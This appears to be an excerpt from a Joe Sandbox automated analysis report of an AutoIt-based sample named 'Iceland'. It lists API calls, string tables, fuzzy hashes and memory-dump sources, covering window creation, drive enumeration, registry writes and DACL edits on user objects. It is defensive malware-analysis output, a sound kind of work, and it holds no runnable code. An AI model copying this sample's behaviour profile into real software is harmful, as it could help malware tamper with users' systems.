                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3822
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AC0C04,00000000), ref: 00AA3838
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AA3848
                                                                                                                                                                                                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AA386E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AA388D
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA38AF
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3A9C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AB7B67
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AB7B98
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AB7BA4
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00AB7BBE
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00AB7BCD
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AB7BF8
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 00AB7C00
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00AB7C07
                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00AB7C16
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB7C1D
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00AB7C68
                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00AB7C9A
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB7CBC
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(00000012), ref: 00AB7E5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SetTextColor.GDI32(?,00AB7B2D), ref: 00AB7E5F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColorBrush.USER32(0000000F), ref: 00AB7E75
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(0000000F), ref: 00AB7E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(00000011), ref: 00AB7E9D
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AB7EAB
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SelectObject.GDI32(?,00000000), ref: 00AB7EBC
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SetBkColor.GDI32(?,?), ref: 00AB7EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SelectObject.GDI32(?,?), ref: 00AB7ED2
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AB7EF1
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AB7F08
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AB7F15
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?), ref: 00A216B4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A62B07
                                                                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A62B40
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A62F85
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A21488,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A21865
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001053), ref: 00A62FC1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A62FD8
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A62FEE
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A62FF9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00AA319B
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AA32C7
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AA3306
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AA3316
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AA335D
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AA3369
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AA33B2
                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AA33C1
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AA33D1
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AA33D5
                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AA33E5
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA33EE
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AA33F7
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AA3423
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AA343A
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AA347A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AA348E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AA349F
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AA34D4
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AA34DF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AA34EA
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AA34F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                • Opcode ID: 056831465b4b77dabdf2244830c9403b02db52c483458a691891a7f3bc45fff6
                                                                                                                                                                                                                                                                • Instruction ID: 7eeb3053b197f3fdef694442e143ef73ed72ba66d71013c28265221daa5a35b5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 056831465b4b77dabdf2244830c9403b02db52c483458a691891a7f3bc45fff6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B13DB1A00215BFEB14DFA8DD45FAE7BA9EB09710F004214F915EB2E1D774AD41CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00A95532
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00ABDC30,?,\\.\,00ABDCD0), ref: 00A9560F
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00ABDC30,?,\\.\,00ABDCD0), ref: 00A9577B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                • Opcode ID: adaaba02c601a6b0549f17445aa717dd332c55f4c9477aa6f3c3410aa97434c8
                                                                                                                                                                                                                                                                • Instruction ID: 5556ed7c42bcfda07e2c0e0bc064aafb83c19d00a6d844f5ebee4269db9c01f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adaaba02c601a6b0549f17445aa717dd332c55f4c9477aa6f3c3410aa97434c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30618C30F48945EBCF2ADF79EE928BC73F1BF54350B244825E406AB291DA319E42CB51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB1BC4
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AB1BD9
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AB1BE0
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB1C35
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB1C55
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AB1C89
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB1CA7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AB1CB9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AB1CCE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AB1CE1
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 00AB1D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AB1D58
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AB1D6C
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AB1D84
                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00AB1DAA
                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00AB1DC4
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 00AB1DDB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AB1E46
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                • Opcode ID: c7774e7e8c8595d42d40aa9a9dbfd0b43a5731e4df6070ca2786ebd41f387f15
                                                                                                                                                                                                                                                                • Instruction ID: 35c17ad11a2be9c81dca02ebf917799ee335d43fa04dca1b061b6423b97fcde5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7774e7e8c8595d42d40aa9a9dbfd0b43a5731e4df6070ca2786ebd41f387f15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB18E71604301AFD714DF68C994BAABBE9FF84310F408A1CF5999B2A2D731E845CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AB0D81
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0DBB
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0E25
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0E8D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0F11
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AB0F61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB0FA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A82BA5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A82BD7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                • Opcode ID: cf2ec56504a900553ec8813e43240f3be4de686fdc120332a62b5840929a1aac
                                                                                                                                                                                                                                                                • Instruction ID: cfc0c6a837baf34b37c842ae5d304aa31681aeea5477f590cd95c5d8abcf1e18
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf2ec56504a900553ec8813e43240f3be4de686fdc120332a62b5840929a1aac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EE1B0312082418FC714EF28CA519BBB3EABF88354F54496CF4969B3A2DB34ED45CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A225F8
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00A22600
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A2262B
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00A22633
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00A22658
                                                                                                                                                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A22675
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A22685
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A226B8
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A226CC
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00A226EA
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A22706
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A22711
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetCursorPos.USER32(?), ref: 00A219E1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: ScreenToClient.USER32(00000000,?), ref: 00A219FE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000001), ref: 00A21A23
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00A2199C), ref: 00A22738
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                • Opcode ID: f88ab3d4ba0d0365df75fd53fd305bda23b689d13e210de9ce45f8d8d0a55c4d
                                                                                                                                                                                                                                                                • Instruction ID: e41b5258d53dc34ceb941f6f8f72c09f83feeb2813ee9b78d7cf43346bb65060
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f88ab3d4ba0d0365df75fd53fd305bda23b689d13e210de9ce45f8d8d0a55c4d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B16B36A00209AFDF14DFA8DD95BAE7BB4FB48314F104229FA15A72A0DB74D942CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A81741
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A81775
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A8178C
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00A817C6
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A817E2
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A817F9
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A81801
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A81808
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A81829
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00A81830
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A8185F
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A81881
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A81893
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818BA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818C1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818CA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818D1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818DA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818E1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A818ED
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818F4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: GetProcessHeap.KERNEL32(00000008,00A814FD,?,00000000,?,00A814FD,?), ref: 00A81AED
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A814FD,?), ref: 00A81AF4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A814FD,?), ref: 00A81B03
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                • Opcode ID: 0829c41afc6b05984a20c0d4d67c221a8fb142c3575ae883e582c2be2dc27d4c
                                                                                                                                                                                                                                                                • Instruction ID: 6375004c58e42ba2990e931a2237f1c3f2292b6b95cf5540a62f81abc92ea754
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0829c41afc6b05984a20c0d4d67c221a8fb142c3575ae883e582c2be2dc27d4c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05713EB2D00209ABDF10EFE5EC45FAEBBBCBF44350F144225F915A61A1E7319906CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AACF1D
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ABDCD0,00000000,?,00000000,?,?), ref: 00AACFA4
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00AAD004
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AAD054
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AAD0CF
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00AAD112
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00AAD221
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00AAD2AD
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAD2E1
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAD2EE
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00AAD3C0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
